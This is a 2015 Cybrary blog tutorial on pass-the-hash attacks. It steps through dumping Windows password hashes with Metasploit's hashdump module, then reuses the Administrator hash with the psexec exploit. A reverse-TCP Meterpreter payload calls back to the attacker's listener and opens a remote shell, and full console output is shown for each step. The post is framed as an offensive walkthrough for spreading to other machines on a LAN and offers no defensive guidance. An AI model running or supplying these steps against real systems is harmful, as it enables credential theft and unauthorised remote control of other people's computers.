Ready to Start Your Career?

Pass The Hash

Multi Thinker's profile image

By: Multi Thinker

July 14, 2015

Pass The Hash - CybraryHi once again,Using this method, all we need is an SMB ( LAN ) fully compromised PC user-name, as we have recently exploited WindowsXp SP 2. Now that we know his user-name, we need to move into the LAN to other PCs.Let's begin...Running the Metasploit console, I assume you have Metasploit opened and have configured our target there. So, let us start with Meterpreter. I will now write a plain/full terminal command because you know the basics.We're going to use "post/windows/gather/hashdump" You can locate it by locating/ searching in terminal. We have accessed CMD recently. We can even cat system login information file ( named / known as SAM ). His hash will be in the format of NTML which is easy to decrypt. But, in our purpose we need to pass the hash directly to it, so we need to use the hashdump in terminal.
meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hashes...Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Knowing that we have the hash, let's use `psexec exploit` to pass that. Open one more terminal in a new instance and open msf console there. We know we need to use `psexec` but we didn't know his location / full path. Let's search for it.
msf > search psexecExploits========Name                       Description----                       -----------windows/smb/psexec         Microsoft Windows Authenticated User Code Executionwindows/smb/smb_relay      Microsoft Windows SMB Relay Code Execution
YES! We got it. Now, let's use it.
msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(psexec) > set LHOST xx.xx.xx.xxLHOST => xx.xx.xx.xxmsf exploit(psexec) > set LPORT 443LPORT => 443msf exploit(psexec) > set RHOST xx.xx.xx.xxRHOST => xx.xx.xx.xxmsf exploit(psexec) > show optionsModule options:Name     Current Setting  Required  Description----     ---------------  --------  -----------RHOST    xx.xx.xx.xx      yes       The target addressRPORT    445              yes       Set the SMB service portSMBPass                   no        The password for the specified usernameSMBUser  Administrator    yes       The username to authenticate asPayload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique: seh, thread, processLHOST     xx.xx.xx.xx      yes       The local addressLPORT     443              yes       The local portExploit target:Id  Name--  ----0   AutomaticSet the SMBPassmsf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cSMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586cmsf exploit(psexec) > exploit[*] Connecting to the server...[*] Started reverse handler[*] Authenticating as user 'Administrator'...[*] Uploading payload...[*] Created KoVCxCjx.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting KoVCxCjx.exe...[*] Sending stage (719360 bytes)[*] Meterpreter session 1 opened (xx.xx.xx.xx:443 -> xx.xx.xx.xx:1045)
Yeah! We got it.meterpreter > shellProcess 3680 created.Channel 1 created.Microsoft Windows [Version 5.2.3790](C) Copyright 1985-2003 Microsoft Corp.C:WINDOWSsystem32>Voila! One more down. Now we have full access to it.-- Multi Thinker
Schedule Demo